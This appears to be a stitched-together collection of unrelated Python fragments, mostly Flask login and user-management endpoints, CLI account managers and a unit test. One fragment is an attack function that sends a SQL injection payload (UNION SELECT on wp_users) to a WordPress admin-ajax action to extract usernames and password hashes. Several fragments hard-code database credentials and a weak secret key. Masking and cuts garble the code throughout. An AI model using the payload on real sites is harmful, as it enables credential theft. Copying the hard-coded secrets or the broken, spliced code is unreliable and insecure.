def deletedUser_POST(): logger.info('\n/deletedUser method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) # si aucune erreur alors le JSON est au bon format try: resp.headers['Content-Type'] = 'application/json' # recuperation de la donnee envoyer au serveur req_data = json.loads(request.data) # recuperation du login login = str(req_data["login"]) # Test des informations de connexion de l'utilisateur if (Login.isLogin(login) == True): resp.status_code = Login.userSuppr(login) # Si login existe deja 1002 else: resp.status_code = 1002 #logger.info(req_data) except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def attack(url): path = url + "/wp-admin/admin-ajax.php?action=get_old_table" headers = { 'content-type': 'application/x-www-form-urlencoded', 'host': 'localhost' } data = { "tableId": "1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID>=0" } print("SQL Injection attack.") username = input("Insert your username: "******"Insert your password: "******"Your login failed. Username or password wrong. Insert them again!" ) username = input("Insert your username: "******"Insert your password: "******":")
def ModifyDescription_POST(): logger.info('\n/ModifyDescription method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) try: resp.headers['Content-Type'] = 'application/json' resp.status_code = 200 req_data = json.loads(request.data) # recuperation du login login = str(req_data["login"]) # recuperation de la description desc = str(req_data["description"]) # recuperation de la description mail = str(req_data["mail"]) req_data=Login.descModif(login,desc) if req_data == 200 : req_data=Login.mailModif(login,mail) resp.status_code=req_data except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp logger.info(resp.data) return resp
def erasePassword_POST(): logger.info('\n/erasePassword method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) try: resp.headers['Content-Type'] = 'application/json' resp.status_code = 200 req_data = json.loads(request.data) # recuperation du login login = str(req_data["login"]) # recuperation du password password = str(req_data["password"]) # Test les informations de connexion de l'utilisateur if (Login.isLogin(login) == True): # Si login et password valid 200 resp.status_code=Login.changePass(login,password) # Si login faux 1002 else: resp.status_code = 1002 except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def forgotPassword_POST(): logger.info('/forgotPassword method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) try: resp.headers['Content-Type'] = 'application/json' # si tu se passe bien retour d'un code erreur 200 resp.status_code = 200 req_data = json.loads(request.data) logger.info(req_data) # recuperation du login login = str(req_data["login"]) # recuperation du mail mail = str(req_data["mail"]) if (Login.isLogin(login) == True): # Si login et password valid 200 resp.status_code=Login.forgetPassword(login,mail) # Si login faux 1002 else: resp.status_code = 1002 except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def capteur_POST(): logger.info('/capteur method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) # si aucune erreur alors le JSON est au bon format try: result={} resp.headers['Content-Type'] = 'application/json' # recuperation de la donnee envoyer au serveur req_data = json.loads(request.data) logger.info(req_data) # recuperation du login login = str(req_data["login"]) # recuperation du capteurId capteurId = str(req_data["capteurId"]) # recuperation de la valeur a renvoyer mesure = str(req_data["mesure"]) # recuperation du dateDebut dateDebut = req_data["dateDebut"] # recuperation du dateFin dateFin = req_data["dateFin"] myArray=[] if (Login.isLogin(login) == True): if ( Probe.isBalise(capteurId)==True): if(Login.userAccess(login,capteurId)==True): if(mesure == "temperature"): myArray=Probe.temperatureValue(login,capteurId,dateDebut,dateFin) elif(mesure == "ozone"): myArray=Probe.ozoneValue(login,capteurId,dateDebut,dateFin) elif(mesure == "hygrometrie"): myArray=Probe.hygrometrieValue(login,capteurId,dateDebut,dateFin) elif(mesure == "humidite"): myArray=Probe.humiditeValue(login,capteurId,dateDebut,dateFin) else: myArray=Probe.capteurValue(login,capteurId,dateDebut,dateFin) #result={"releve":myArray} result["releve"]=myArray resp.data=json.dumps(result) resp.status_code = 200 logger.info(resp.data) else: # Le user n'a pas acces au capteur resp.status_code=1007 else: # Le capteur n'existe pas resp.status_code=1006 else: # Le login n'existe pas resp.status_code=1002 except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def performLogin(url): username = input("\nInsert your username: "******"Insert your password: "******"\nYour login failed, Username or password are wrong, insert them again" ) username = input("Insert your username: "******"Insert your password: ") result = LoginManager.login(url, username, password)
def main(): # my code here options, remainder = getopt.gnu_getopt( sys.argv[1:], 'upcea', ['user='******'password='******'cellphone=', 'email=', 'action=']) user = "******" password = "******" cellphone = "empty_phone" action = "empty_action" email = "empty_email" classstring = "empty_class" sectionfrom = "empty_section" sectionto = "empty_section" userid = "empty_userid" for opt, arg in options: if opt in ('-u', '--user'): user = arg elif opt in ('-p', '--password'): password = arg elif opt in ('-c', '--cellphone'): cellphone = arg elif opt in ('-e', '--email'): email = arg # elif opt in ('-i', '--id'): # userid = arg # elif opt in ('-l','--lecturestring'): # classstring = arg # elif opt in ('-f','--from'): # sectionfrom = arg # elif opt in ('-t', '--to'): # sectionto = arg elif opt in ('-a' '--action'): action = arg else: print "wrong args" cnx = mysql_connect() if action == "createuser": login_manager = LoginManager.loginManager(cnx) # login_manager.create_user(user, password, email, cellphone, cnx) print(login_manager.create_user(user, password, email, cellphone)) elif action == "loginuser": login_manager = LoginManager.loginManager(cnx) print(login_manager.login_user(user, password)) elif action == "addclass": discussion_manager = DiscussionManager.discussionManager(cnx) print( discussion_manager.add_class(userid, classstring, sectionfrom, sectionto)) cnx.close()
def login_POST(): logger.info('\n/login method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) tmp={"nom":"toto","prenom":"toto","description":"toto","login":"******"} # si aucune erreur alors le JSON est au bon format try: resp.headers['Content-Type'] = 'application/json' # recuperation de la donnee envoyer au serveur req_data = json.loads(request.data) # recuperation du login login = str(req_data["login"]) # recuperation du password password = str(req_data["password"]) # Test des informations de connexion de l'utilisateur if (Login.isLogin(login) == True): # Si login et password valid 200 if (Login.isPass(login, password) == True): resp.status_code = 200 tmp=Login.userInfo(login) # Si password faux 1003 else: resp.status_code = 1003 # Si login faux 1002 else: resp.status_code = 1002 # Conversion Reponse to JSON resp.data=json.dumps(tmp) logger.info(resp.data) except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def user_POST(): logger.info('/user method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) # si aucune erreur alors le JSON est au bon format try: resp.headers['Content-Type'] = 'application/json' # recuperation de la donnee envoyer au serveur req_data = json.loads(request.data) logger.info(req_data) # recuperation du login login = str(req_data["login"]) # recuperation du password password = str(req_data["password"]) # recuperation du nom nom = str(req_data["nom"]) # recuperation du prenom prenom = str(req_data["prenom"]) # recuperation du mail mail = str(req_data["mail"]) # recuperation du description desc = str(req_data["description"]) if (Login.isLogin(login) == False): resp.status_code = Login.insertUser(login, password, nom, prenom, desc,mail) # Si login existe deja 1005 else: resp.status_code = 1005 logger.info(req_data) except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def modifyPassword_POST(): logger.info('/modifyPassword method : POST') logger.info(request.data) resp = make_response() addCorsHeaders(resp) try: resp.headers['Content-Type'] = 'application/json' # si tu se passe bien retour d'un code erreur 200 resp.status_code = 200 req_data = json.loads(request.data) logger.info(req_data) # recuperation du login login = str(req_data["login"]) # recuperation du ancienPassword aPassword = str(req_data["ancienPassword"]) # recuperation du newPassword nPassword = str(req_data["newPassword"]) if (Login.isLogin(login) == True): # Si login et password valid 200 if (Login.isPass(login, aPassword) == True): resp.status_code = 200 tmp=Login.changePass(login,nPassword) # Si password faux 1003 else: resp.status_code = 1003 # Si login faux 1002 else: resp.status_code = 1002 except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp return resp
def userlist_GET(): logger.info('\n/userList method : GET') resp = make_response() addCorsHeaders(resp) try: resp.headers['Content-Type'] = 'application/json' resp.status_code = 200 req_data=Login.userList() resp.data = json.dumps(req_data) except Exception as e: print (e) # si une erreur de format retour erreur 1004 resp.status_code = 1004 resp.data = "error 1004 : Bad format json" return resp logger.info(resp.data) return resp
from flask_sqlalchemy import SQLAlchemy from flask -login import LoginManager ################ #### config #### ################ app = Flask(__name__, instance_relative_config=True) app.config.from_pyfile('flask.cfg') db = SQLAlchemy(app) login_manager = LoginManager() login_manager.init_app(app) login_manager.login_view = "users.login" from project.models import User @login_manager.user_loader def load_user(user_id): return User.query.filter(User.id == int(user_id)).first() #################### #### blueprints #### ####################
import os import logging from logging.handlers import RotatingFileHandler from flask import Flask from flask-sqlalchemy import SQLAlchemy from flask-login import LoginManager from flask-migrate import Migrate from flask-bootstrap import Bootstrap from config import Config app = Flask(__name__) app.config.from_object(Config) db = SQLAlchemy(app) login = LoginManager(app) migrate = Migrate(app, db) login.login_view = 'login' if not app.debug: if not os.path.exists('logs'): os.mkdir('logs')
from LoginManager import * ''' .. ---------------------------------------------------------------------- Ran 2 tests in 0.001s OK ''' # global managers to point to passwordManagerOne = PasswordManager() loginManagerOne = LoginManager(passwordManagerOne) passwordManagerTwo = PasswordManager() loginManagerTwo = LoginManager(passwordManagerTwo) passwordManagerThree = PasswordManager() loginManagerThree = LoginManager(passwordManagerThree) class LoginManagerTest(unittest.TestCase): global loginManagerOne, loginManagerTwo, loginManagerThree, passwordManagerOne, passwordManagerTwo, passwordManagerThree def test_gettingPasswords(self): # test successful connection self.assertEqual(passwordManagerOne.getDatabasePassword(), "password") self.assertEqual(passwordManagerOne.getFtpPassword(), "password")
resp = s.recv(1024) if resp != b"Accept": s.close() sys.exit(0) def sendToServer(plaintext): """Function to send message with signature to server""" signature = keys.signUsingPrivateKey(plaintext) encryptedText = keys.encrypt(plaintext, serverSessionKey) s.send(encryptedText) time.sleep(1) s.send(signature) # Creates log-in manager login = lm.LoginManager() currentUser = None # Loop infinitely until user is logged into the system while True: cmd = input("What would you like to do? [R] for register, [L] for login, [Q] for quit. \n") # Quitting program if cmd.upper() == "Q": print("Exiting, goodbye!") s.send(b"Close") s.close() sys.exit(0) # Sending registration request with digital signature elif cmd.upper() == "R":
from flask import Flask, render_template, request, redirect, url_for, make_response from flask_pymongo import PyMongo from flask_wtf import FlaskForm from wtforms import StringField, validators from flask-login import LoginManager() mongo = PyMongo() login_manager = LoginManager() app = Flask(__name__) app.config['MONGO_URI'] = 'mongodb+srv://eoghan:[email protected]/test?retryWrites=true&w=majority' app.config['SECRET_KEY'] = "somekey" login_manager.init_app(app) mongo.init_app(app) client = mongo.cx db = client.beta_db comments = db.comments comment = 'Submit YES to get started.' class LoginForm(FlaskForm): name = StringField('username', validators = [validators.DataRequired()]) @app.route('/login', methods = ['GET', 'POST']) def login(): form = LoginForm() if form.validate_on_submit(): # login_user(user) flask.flash('Loggin in successfully.') return redirect(flask.url_for('index'))
def main(): # my code here options, remainder = getopt.gnu_getopt(sys.argv[1:], 'upcea', ['user='******'password='******'cellphone=', 'email=', 'classstring=', 'sectionfrom=', 'sectionto=', 'userid=', 'action=', 'leader=", 'teamname=', 'section=', 'remain=', 'desc=' ]) user = "******" password = "******" cellphone = "empty_phone" action = "empty_action" email = "empty_email" classstring = "empty_class" sectionfrom = "empty_section" sectionto = "empty_section" userid = "empty_userid" leader = "empty_leader" teamname = "empty_teamname" section = "empty_section" remain = "empty_remain" desc = "empty_remain" for opt, arg in options: if opt in ('-u', '--user'): user = arg elif opt in ('-p', '--password'): password = arg elif opt in ('-c', '--cellphone'): cellphone = arg elif opt in ('-e', '--email'): email = arg elif opt in ('--userid'): userid = arg elif opt in ('--classstring'): classstring = arg elif opt in ('--sectionfrom'): sectionfrom = arg elif opt in ('--sectionto'): sectionto = arg elif opt in ('--action'): action = arg elif opt in ('--leader'): leader = arg elif opt in ('--teamname'): teamname = arg elif opt in ('--sction'): section = arg elif opt in ('--remain'): remain = arg elif opt in ('--desc'): desc = arg else: print "wrong args" ''' todo: able to receive GroupManager argument from command line create Groupanager instances and call its methods ''' sqlconnector = MysqlConnector.mysqlconnector("hongkan", "aa6418463", "realone.c0hpz27iuq3x.us-west-1.rds.amazonaws.com", "GJ_TEST_DB") cnx = sqlconnector.mysql_connect() if action == "createuser" : login_manager = LoginManager.loginManager(cnx) # login_manager.create_user(user, password, email, cellphone, cnx) print(login_manager.create_user(user, password, email, cellphone)) elif action == "loginuser" : login_manager = LoginManager.loginManager(cnx) print(login_manager.login_user(user, password)) elif action == "addclass" : discussion_manager = DiscussionManager.discussionManager(cnx) print(discussion_manager.add_class(userid, classstring, sectionfrom, sectionto)) elif action == "removeclass" : discussion_manager = DiscussionManager.discussionManager(cnx) print(discussion_manager.remove_class(userid, classstring)) elif action == "getjson" : discussion_manager = DiscussionManager.discussionManager(cnx) discussion_manager.getJSON(userid) elif action == "raiseTeam" : team_manager = TeanManager.teamManager(cnx) print(team_manager.raise_team(leader, teamname, classstring, section, remain, desc)) elif action == "joinTeam" : team_manager = TeanManager.teamManager(cnx) print(join_teams(username, teamname, classstring, section)) cnx.close()